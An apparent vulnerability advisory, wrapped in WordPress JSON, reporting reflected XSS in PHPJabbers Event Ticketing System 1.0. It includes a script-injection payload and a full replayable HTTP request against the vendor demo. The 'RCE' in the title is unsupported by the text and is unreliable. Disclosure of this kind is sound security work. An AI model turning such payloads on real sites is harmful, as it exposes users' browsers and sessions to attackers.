## Title: Event Ticketing System-1.0 XSS-Reflected – RCE
\n## Author: nu11secur1ty
\n## Date: 09\/08\/2023
\n## Vendor: https:\/\/www.phpjabbers.com\/
\n## Software: https:\/\/www.phpjabbers.com\/event-ticketing-system\/#sectionDemo
\n## Reference: https:\/\/portswigger.net\/web-security\/cross-site-scripting\/reflected<\/p>\n
## Description:
\nThe value of the `id` request parameter is copied into the value of an
\nHTML tag attribute which is encapsulated in double quotation marks.
\nThe payload }}uypja”><script>alert(1)<\/script>k36c0 was submitted in
\nthe id parameter. This input was echoed as
\nuypja”><script>alert(1)<\/script>k36c0 in the application’s response.
\nThe attacker can use this vulnerability to trick the user into
\nexecuting – opening the browser on his machine and opening a hazardous
\nURL address.<\/p>\n
STATUS: HIGH Vulnerability<\/p>\n[+]Testing Payload:
\n“`GET
\nGET \/1694154671_204\/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplm
\nHTTP\/1.1
\nHost: demo.phpjabbers.com
\nAccept-Encoding: gzip, deflate
\nAccept: *\/*
\nAccept-Language: en-US;q=0.9,en;q=0.8
\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)
\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.5845.141
\nSafari\/537.36
\nConnection: close
\nCache-Control: max-age=0
\nCookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7
\nOrigin: http:\/\/demo.phpjabbers.com
\nReferer: http:\/\/demo.phpjabbers.com\/
\nSec-CH-UA: “.Not\/A)Brand”;v=”99″, “Google Chrome”;v=”116″, “Chromium”;v=”116″
\nSec-CH-UA-Platform: Windows
\nSec-CH-UA-Mobile: ?0<\/p>\n
“`<\/p>\n
## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/phpjabbers\/2023\/Event-Ticketing-System-1.0)<\/p>\n
## Proof and Exploit:
\n[href](https:\/\/www.nu11secur1ty.com\/2023\/09\/event-ticketing-system-10-xss-reflected.html)<\/p>\n
## Time spent:
\n01:25:00<\/p>\n","protected":false},"excerpt":{"rendered":"
## Title: Event Ticketing System-1.0 XSS-Reflected – RCE ## Author: nu11secur1ty ## Date: 09\/08\/2023 ## Vendor: https:\/\/www.phpjabbers.com\/ ## Software: https:\/\/www.phpjabbers.com\/event-ticketing-system\/#sectionDemo ## Reference: https:\/\/portswigger.net\/web-security\/cross-site-scripting\/reflected ## Description: The value of the `id` request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload }}uypja”><script>alert(1)<\/script>k36c0 was submitted in …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-48088","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=48088"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088\/revisions"}],"predecessor-version":[{"id":48327,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088\/revisions\/48327"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=48088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=48088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=48088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}